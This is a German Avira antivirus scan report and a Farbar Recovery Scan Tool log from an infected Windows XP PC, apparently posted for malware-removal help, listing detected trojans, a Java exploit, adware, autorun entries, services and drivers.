Durchsuche Prozess 'Avira.OE.ServiceHost.exe' - '144' Modul(e) wurden durchsucht
Durchsuche Prozess 'TeamViewer_Desktop.exe' - '54' Modul(e) wurden durchsucht
Durchsuche Prozess 'tv_w32.exe' - '37' Modul(e) wurden durchsucht
Durchsuche Prozess 'alg.exe' - '35' Modul(e) wurden durchsucht
Durchsuche Prozess 'TeamViewer.exe' - '92' Modul(e) wurden durchsucht
Durchsuche Prozess 'fxssvc.exe' - '37' Modul(e) wurden durchsucht
Durchsuche Prozess 'TeamViewer_Service.exe' - '65' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '41' Modul(e) wurden durchsucht
Durchsuche Prozess 'slserv.exe' - '6' Modul(e) wurden durchsucht
Durchsuche Prozess 'MDM.EXE' - '23' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '36' Modul(e) wurden durchsucht
Durchsuche Prozess 'firefox.exe' - '24' Modul(e) wurden durchsucht
Durchsuche Prozess 'BrMfcmon.exe' - '29' Modul(e) wurden durchsucht
Durchsuche Prozess 'brccMCtl.exe' - '72' Modul(e) wurden durchsucht
Durchsuche Prozess 'ctfmon.exe' - '29' Modul(e) wurden durchsucht
Durchsuche Prozess 'pdf24.exe' - '30' Modul(e) wurden durchsucht
Durchsuche Prozess 'pptd40nt.exe' - '26' Modul(e) wurden durchsucht
Durchsuche Prozess 'BrMfcWnd.exe' - '41' Modul(e) wurden durchsucht
Durchsuche Prozess 'SynTPEnh.exe' - '29' Modul(e) wurden durchsucht
Durchsuche Prozess 'SynTPLpr.exe' - '24' Modul(e) wurden durchsucht
Durchsuche Prozess 'hkcmd.exe' - '31' Modul(e) wurden durchsucht
Durchsuche Prozess 'igfxtray.exe' - '30' Modul(e) wurden durchsucht
Durchsuche Prozess 'spoolsv.exe' - '59' Modul(e) wurden durchsucht
Durchsuche Prozess 'Explorer.EXE' - '127' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '39' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '34' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '170' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '40' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '55' Modul(e) wurden durchsucht
Durchsuche Prozess 'lsass.exe' - '60' Modul(e) wurden durchsucht
Durchsuche Prozess 'services.exe' - '35' Modul(e) wurden durchsucht
Durchsuche Prozess 'winlogon.exe' - '80' Modul(e) wurden durchsucht
Durchsuche Prozess 'csrss.exe' - '14' Modul(e) wurden durchsucht
Durchsuche Prozess 'smss.exe' - '2' Modul(e) wurden durchsucht

Der Suchlauf auf Verweise zu ausführbaren Dateien (Registry) wird begonnen:
Die Registry wurde durchsucht ( '2898' Dateien ).


Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'C:\' <System>
C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Sun\Java\Deployment\cache\6.0\15\2b0eeccf-65e35b08
    [0] Archivtyp: ZIP
    --> bpac/b.class
        [FUND]      Enthält Erkennungsmuster des Exploits EXP/CVE-2010-0840.L
        [WARNUNG]   Infizierte Dateien in Archiven können nicht repariert werden
    --> bpac/KAVS.class
        [FUND]      Enthält Erkennungsmuster des Exploits EXP/CVE-2010-0840.BB
        [WARNUNG]   Infizierte Dateien in Archiven können nicht repariert werden
    --> bpac/purok.class
        [FUND]      Enthält Erkennungsmuster des Exploits EXP/CVE-2010-0840
        [WARNUNG]   Infizierte Dateien in Archiven können nicht repariert werden
C:\Dokumente und Einstellungen\USER\Eigene Dateien\Downloads\2014_11rechnung_K4768955881.zip
    [0] Archivtyp: ZIP
    --> 2014_11rechnung_K4768955881_pdf_sign_telekom_de_deutschland_gmbh.pdf.exe
        [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.108570
        [WARNUNG]   Infizierte Dateien in Archiven können nicht repariert werden
C:\Dokumente und Einstellungen\USER\Eigene Dateien\Downloads\FileZilla_3.7.3_win32-setup.exe
  [FUND]      Enthält Erkennungsmuster der Adware ADWARE/InstallCore.Gen
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\29.tmp
  [FUND]      Ist das Trojanische Pferd TR/Agent.115712.60
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1339\A0313368.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.108570
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1339\A0313402.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.108849
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1340\A0313410.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.109188
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1340\A0313419.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.109442

Beginne mit der Desinfektion:
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1340\A0313419.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.109442
  [HINWEIS]   Die Datei wurde gelöscht.
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1340\A0313410.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.109188
  [HINWEIS]   Die Datei wurde gelöscht.
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1339\A0313402.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.108849
  [HINWEIS]   Die Datei wurde gelöscht.
C:\System Volume Information\_restore{6B916A41-8485-4A6A-BC69-669605E696B1}\RP1339\A0313368.exe
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.108570
  [HINWEIS]   Die Datei wurde gelöscht.
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\29.tmp
  [FUND]      Ist das Trojanische Pferd TR/Agent.115712.60
  [HINWEIS]   Die Datei wurde gelöscht.
C:\Dokumente und Einstellungen\USER\Eigene Dateien\Downloads\FileZilla_3.7.3_win32-setup.exe
  [FUND]      Enthält Erkennungsmuster der Adware ADWARE/InstallCore.Gen
  [HINWEIS]   Die Datei wurde gelöscht.
C:\Dokumente und Einstellungen\USER\Eigene Dateien\Downloads\2014_11rechnung_K4768955881.zip
  [FUND]      Ist das Trojanische Pferd TR/Crypt.Xpack.108570
  [HINWEIS]   Der Fund wurde als verdächtig eingestuft.
  [HINWEIS]   Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '571ce70c.qua' verschoben!
C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Sun\Java\Deployment\cache\6.0\15\2b0eeccf-65e35b08
  [FUND]      Enthält Erkennungsmuster des Exploits EXP/CVE-2010-0840
  [HINWEIS]   Die Datei wurde gelöscht.


Ende des Suchlaufs: Dienstag, 11. November 2014  18:13
Benötigte Zeit:  2:24:12 Stunde(n)

Der Suchlauf wurde vollständig durchgeführt.

   8070 Verzeichnisse wurden überprüft
 400253 Dateien wurden geprüft
     10 Viren bzw. unerwünschte Programme wurden gefunden
      0 Dateien wurden als verdächtig eingestuft
      7 Dateien wurden gelöscht
      0 Viren bzw. unerwünschte Programme wurden repariert
      1 Dateien wurden in die Quarantäne verschoben
      0 Dateien wurden umbenannt
      0 Dateien konnten nicht durchsucht werden
 400243 Dateien ohne Befall
  12724 Archive wurden durchsucht
      4 Warnungen
      8 Hinweise
 397197 Objekte wurden beim Rootkitscan durchsucht
      0 Versteckte Objekte wurden gefunden

FRST Logfile:

FRST Logfile:

FRST Logfile:

Code:

ATTFilter

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-11-2014
Ran by USER (administrator) on KLAUS on 12-11-2014 13:14:01
Running from C:\Dokumente und Einstellungen\USER\Eigene Dateien\Downloads
Loaded Profile: USER (Available profiles: USER)
Platform: Microsoft Windows XP Home Edition Service Pack 3 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 8
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Avira Operations GmbH & Co. KG) C:\Programme\Avira\AntiVir Desktop\sched.exe
(Intel Corporation) C:\WINDOWS\system32\igfxtray.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Synaptics, Inc.) C:\Programme\Synaptics\SynTP\SynTPLpr.exe
(Synaptics, Inc.) C:\Programme\Synaptics\SynTP\SynTPEnh.exe
(Brother Industries, Ltd.) C:\Programme\Brother\Brmfcmon\BrMfcWnd.exe
(Nuance Communications, Inc.) C:\Programme\ScanSoft\PaperPort\pptd40nt.exe
(Geek Software GmbH) C:\Programme\pdf24\pdf24.exe
(Avira Operations GmbH & Co. KG) C:\Programme\Avira\My Avira\Avira.OE.Systray.exe
(Avira Operations GmbH & Co. KG) C:\Programme\Avira\AntiVir Desktop\avgnt.exe
(Brother Industries, Ltd.) C:\Programme\Brother\ControlCenter3\BrccMCtl.exe
(Avira Operations GmbH & Co. KG) C:\Programme\Avira\AntiVir Desktop\avguard.exe
(Microsoft Corporation) C:\Programme\Gemeinsame Dateien\Microsoft Shared\VS7DEBUG\MDM.EXE
( ) C:\WINDOWS\system32\slserv.exe
(TeamViewer GmbH) C:\Programme\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\WINDOWS\system32\fxssvc.exe
(Avira Operations GmbH & Co. KG) C:\Programme\Avira\My Avira\Avira.OE.ServiceHost.exe
(Brother Industries, Ltd.) C:\Programme\Brother\Brmfcmon\BrMfcMon.exe
(TeamViewer GmbH) C:\Programme\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Programme\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Programme\TeamViewer\Version9\TeamViewer_Desktop.exe
(Avira Operations GmbH & Co. KG) C:\Programme\Avira\AntiVir Desktop\avshadow.exe
(Mozilla Corporation) C:\Programme\Mozilla Thunderbird\thunderbird.exe
(Avira Operations GmbH & Co. KG) C:\Programme\Avira\AntiVir Desktop\avcenter.exe
(Mozilla Corporation) C:\Programme\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Programme\Mozilla Firefox\plugin-container.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPLpr] => C:\Programme\Synaptics\SynTP\SynTPLpr.exe [98304 2004-05-07] (Synaptics, Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Programme\Synaptics\SynTP\SynTPEnh.exe [536576 2004-05-07] (Synaptics, Inc.)
HKLM\...\Run: [BrMfcWnd] => C:\Programme\Brother\Brmfcmon\BrMfcWnd.exe [663552 2007-03-12] (Brother Industries, Ltd.)
HKLM\...\Run: [ControlCenter3] => C:\Programme\Brother\ControlCenter3\brctrcen.exe [65536 2007-01-26] (Brother Industries, Ltd.)
HKLM\...\Run: [SSBkgdUpdate] => C:\Programme\Gemeinsame Dateien\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [210472 2006-10-25] (Nuance Communications, Inc.)
HKLM\...\Run: [PaperPort PTD] => C:\Programme\ScanSoft\PaperPort\pptd40nt.exe [30248 2007-01-29] (Nuance Communications, Inc.)
HKLM\...\Run: [IndexSearch] => C:\Programme\ScanSoft\PaperPort\IndexSearch.exe [46632 2007-01-29] (Nuance Communications, Inc.)
HKLM\...\Run: [PPort11reminder] => C:\Programme\ScanSoft\PaperPort\Ereg\Ereg.exe [255528 2007-02-01] (Nuance Communications, Inc.)
HKLM\...\Run: [PDFPrint] => C:\Programme\pdf24\pdf24.exe [189480 2014-02-06] (Geek Software GmbH)
HKLM\...\Run: [Adobe ARM] => C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-12-21] (Adobe Systems Incorporated)
HKLM\...\Run: [Avira Systray] => C:\Programme\Avira\My Avira\Avira.OE.Systray.exe [124208 2014-10-22] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [avgnt] => C:\Programme\Avira\AntiVir Desktop\avgnt.exe [703736 2014-10-23] (Avira Operations GmbH & Co. KG)
HKLM\...\Run: [MSConfig] => C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe [172544 2008-04-14] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxsrvc.dll (Intel Corporation)
HKU\S-1-5-21-2696325089-3607014519-4140266021-1007\...\Run: [MSMSGS] => C:\Programme\Messenger\msmsgs.exe [1695232 2008-04-14] (Microsoft Corporation)
HKU\S-1-5-21-2696325089-3607014519-4140266021-1007\...\Run: [fkmrussq.exe] => C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Identities\fkmrussq.exe [163840 2008-04-14] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://toolbar.inbox.com/search/dispatcher.aspx?tp=aus&qkw=%s&tbid=%tb_id&%language
HKLM\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://toolbar.inbox.com/search/ie.aspx?tbid=80752&lng=de
HKLM\Software\Microsoft\Internet Explorer\Main,CustomizeSearch = hxxp://toolbar.inbox.com/help/sa_customize.aspx?tbid=80752
URLSearchHook: HKCU - (No Name) - {D3D233D5-9F6D-436C-B6C7-E63F77503B30} -  No File
SearchScopes: HKCU - DefaultScope {9E89C220-A5E3-43FE-89EF-7F74B8CA1B4C} URL = hxxp://www.google.de/search?q={searchTerms}&rlz=1I7SUNA_de
SearchScopes: HKCU - {359A774A-7A2C-43B0-99E1-5A0884B4E342} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=crm&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYDE&apn_uid=4A84DF67-869A-4B14-B028-C9243FBFC51C&apn_sauid=AEB9CB05-4767-4B36-8004-EA6D120F1847
SearchScopes: HKCU - {643E2234-A047-471F-970A-81DED2EE4BA0} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b1ie7
SearchScopes: HKCU - {648DA86C-F15C-47F0-B529-1E92AD900B05} URL = hxxp://de.wikipedia.org/wiki/Spezial:Search?search={searchTerms}
SearchScopes: HKCU - {9E89C220-A5E3-43FE-89EF-7F74B8CA1B4C} URL = hxxp://www.google.de/search?q={searchTerms}&rlz=1I7SUNA_de
SearchScopes: HKCU - {C04B7D22-5AEC-4561-8F49-27F6269208F6} URL = hxxp://toolbar.inbox.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=80752&lng=de
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Programme\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: Babylon IE plugin -> {9CFACCB6-2F3F-4177-94EA-0D2B72D384C1} -> C:\Programme\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll No File
BHO: PDF-XChange Viewer IE-Plugin -> {C5D07EB6-BBCE-4DAE-ACBB-D13A8D28CB1F} -> C:\Programme\Tracker Software\PDF-XChange Viewer\pdf-viewer\PDFXCviewIEPlugin.dll (Tracker Software Products Ltd.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Programme\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1

FireFox:
========
FF ProfilePath: C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Mozilla\Firefox\Profiles\q2sr3eyh.default
FF SearchEngineOrder.1: Ask.com
FF SelectedSearchEngine: Google
FF Homepage: hxxp://www.google.de/
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_15_0_0_223.dll ()
FF Plugin: @java.com/DTPlugin,version=10.9.2 -> C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin -> C:\Programme\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Programme\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF user.js: detected! => C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Mozilla\Firefox\Profiles\q2sr3eyh.default\user.js
FF Plugin ProgramFiles/Appdata: C:\Programme\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Mozilla\Firefox\Profiles\q2sr3eyh.default\searchplugins\askcom.xml
FF SearchPlugin: C:\Programme\mozilla firefox\searchplugins\babylon.xml
FF SearchPlugin: C:\Programme\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Programme\mozilla firefox\browser\searchplugins\ddg.xml
FF SearchPlugin: C:\Programme\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Programme\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Programme\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: Avira Browser Safety - C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Mozilla\Firefox\Profiles\q2sr3eyh.default\Extensions\abs@avira.com [2014-11-12]
FF Extension: No Name - C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Mozilla\Firefox\Profiles\q2sr3eyh.default\Extensions\trash [2014-11-12]
FF Extension: Microsoft .NET Framework Assistant - C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Mozilla\Firefox\Profiles\q2sr3eyh.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2012-07-29]
FF Extension: Java Console - C:\Programme\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-12-07]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-04-01]

Chrome: 
=======
CHR Profile: C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Anwendungsdaten\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Anwendungsdaten\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-05-17]
CHR Extension: (Google-Suche) - C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Anwendungsdaten\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-05-17]
CHR Extension: (Google Mail) - C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Anwendungsdaten\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-05-17]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AntiVirSchedulerService; C:\Programme\Avira\AntiVir Desktop\sched.exe [432888 2014-10-23] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Programme\Avira\AntiVir Desktop\avguard.exe [432888 2014-10-23] (Avira Operations GmbH & Co. KG)
R2 Avira.OE.ServiceHost; C:\Programme\Avira\My Avira\Avira.OE.ServiceHost.exe [164656 2014-10-22] (Avira Operations GmbH & Co. KG)
R2 MDM; C:\Programme\Gemeinsame Dateien\Microsoft Shared\VS7DEBUG\MDM.EXE [322120 2003-06-19] (Microsoft Corporation)
S3 MozillaMaintenance; C:\Programme\Mozilla Maintenance Service\maintenanceservice.exe [114288 2014-11-07] (Mozilla Foundation)
S3 ose; C:\Programme\Gemeinsame Dateien\Microsoft Shared\Source Engine\OSE.EXE [89136 2003-07-28] (Microsoft Corporation)
R2 SLService; C:\WINDOWS\system32\slserv.exe [45056 2004-04-19] ( )
S3 Software Jukebox v2.0 Service; C:\Programme\Gemeinsame Dateien\Microsoft Shared\Service\Software Jukebox v2.0 Service File.exe [68096 2005-03-21] () [File not signed]
R2 TeamViewer9; C:\Programme\TeamViewer\Version9\TeamViewer_Service.exe [4799760 2014-09-12] (TeamViewer GmbH)
S3 WMPNetworkSvc; C:\Programme\Windows Media Player\wmpnetwk.exe [920576 2006-11-03] (Microsoft Corporation)
S2 winvnc; "C:\Programme\TightVNC\WinVNC.exe" -service [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
S1 ARK3280; C:\WINDOWS\System32\DRIVERS\GrabberDev.sys [231936 2011-06-07] (Windows (R) Codename Longhorn DDK provider) [File not signed]
R2 avgntflt; C:\WINDOWS\System32\DRIVERS\avgntflt.sys [98160 2014-10-23] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\WINDOWS\System32\DRIVERS\avipbb.sys [136216 2014-10-23] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\WINDOWS\System32\DRIVERS\avkmgr.sys [37352 2014-10-23] (Avira Operations GmbH & Co. KG)
S3 AX88172; C:\WINDOWS\System32\DRIVERS\ax88172.sys [11871 2003-07-01] (ASIX Electronics Corp.)
R3 BrScnUsb; C:\WINDOWS\System32\DRIVERS\BrScnUsb.sys [15295 2004-10-15] (Brother Industries Ltd.)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation)
R3 CONAN; C:\WINDOWS\System32\drivers\o2mmb.sys [191092 2004-02-12] (O2 Micro )
S3 CVirtA; C:\WINDOWS\System32\DRIVERS\CVirtA.sys [5315 2005-05-17] (Cisco Systems, Inc.)
S3 FETNDIS; C:\WINDOWS\System32\DRIVERS\fetnd5.sys [27165 2001-08-17] (VIA Technologies, Inc.              )
S3 MbxStby; C:\WINDOWS\System32\drivers\MbxStby.sys [6100 2004-01-28] (O2 Micro)
S3 MPE; C:\WINDOWS\System32\DRIVERS\MPE.sys [15232 2008-04-13] (Microsoft Corporation)
S3 Mtlmnt5; C:\WINDOWS\System32\DRIVERS\Mtlmnt5.sys [230656 2004-04-19] ( )
S3 Mtlstrm; C:\WINDOWS\System32\DRIVERS\Mtlstrm.sys [1301488 2004-04-19] ( )
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation)
S3 NtMtlFax; C:\WINDOWS\System32\DRIVERS\NtMtlFax.sys [180664 2004-04-19] ( )
R0 RecAgent; C:\WINDOWS\System32\DRIVERS\RecAgent.sys [13912 2004-04-19] ( )
R3 RTL8023xp; C:\WINDOWS\System32\DRIVERS\Rtlnicxp.sys [70144 2004-04-13] (Realtek Semiconductor Corporation                           )
S3 rtl8139; C:\WINDOWS\System32\DRIVERS\RTL8139.SYS [20992 2004-08-03] (Realtek Semiconductor Corporation)
S3 S3SavageNB; C:\WINDOWS\System32\DRIVERS\s3gnbm.sys [166912 2004-08-03] (S3 Graphics, Inc.)
S3 Slntamr; C:\WINDOWS\System32\DRIVERS\slntamr.sys [635152 2004-04-19] ( )
S3 SlNtHal; C:\WINDOWS\System32\DRIVERS\Slnthal.sys [95760 2004-04-19] ( )
S3 SlWdmSup; C:\WINDOWS\System32\DRIVERS\SlWdmSup.sys [13312 2004-04-19] ( )
R1 ssmdrv; C:\WINDOWS\System32\DRIVERS\ssmdrv.sys [28520 2014-10-23] (Avira GmbH)
R2 StarOpen; C:\WINDOWS\system32\Drivers\StarOpen.sys [13120 2013-08-25] ()
R3 VIAudio; C:\WINDOWS\System32\drivers\vinyl97.sys [159488 2004-07-23] (VIA Technologies, Inc.)
S3 w22n51; C:\WINDOWS\System32\DRIVERS\w22n51.sys [1657344 2004-03-07] (Intel® Corporation)
S3 Wdm1; C:\WINDOWS\System32\Drivers\usbbc.sys [15576 2001-01-08] ()
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation)
S3 vsdatant; \??\C:\WINDOWS\system32\vsdatant.sys [X]
U1 WS2IFSL; No ImagePath

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-12 13:13 - 2014-11-12 13:14 - 00000000 ____D () C:\FRST
2014-11-12 10:00 - 2014-11-12 10:02 - 00000000 ____D () C:\WINDOWS\pss
2014-11-11 18:30 - 2014-11-11 18:30 - 00000708 _____ () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Mozilla Firefox.lnk
2014-11-11 18:30 - 2014-11-11 18:30 - 00000702 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Mozilla Firefox.lnk
2014-11-11 18:19 - 2014-11-11 18:19 - 00002272 _____ () C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\FontCache3.0.0.0.dat
2014-11-11 16:20 - 2014-11-11 16:20 - 00000793 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\TeamViewer 9.lnk
2014-11-11 16:20 - 2014-11-11 16:20 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\TeamViewer 9
2014-11-11 15:22 - 2014-11-11 15:22 - 00000000 ____D () C:\Dokumente und Einstellungen\LocalService\Anwendungsdaten\Adobe
2014-11-11 14:10 - 2014-11-11 16:29 - 00000000 ____D () C:\WINDOWS\system32\NtmsData
2014-11-11 10:49 - 2014-11-11 10:49 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Avira
2014-11-11 10:36 - 2014-11-11 10:36 - 00000000 ____D () C:\Dokumente und Einstellungen\LocalService\Anwendungsdaten\Avira
2014-11-11 10:25 - 2014-10-23 14:02 - 00037352 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2014-11-11 10:25 - 2014-10-23 14:02 - 00028520 _____ (Avira GmbH) C:\WINDOWS\system32\Drivers\ssmdrv.sys
2014-11-11 10:25 - 2014-10-23 14:01 - 00136216 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2014-11-11 10:25 - 2014-10-23 14:01 - 00098160 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2014-11-11 10:18 - 2014-11-11 10:18 - 00000000 ____D () C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\AviraSpeedup
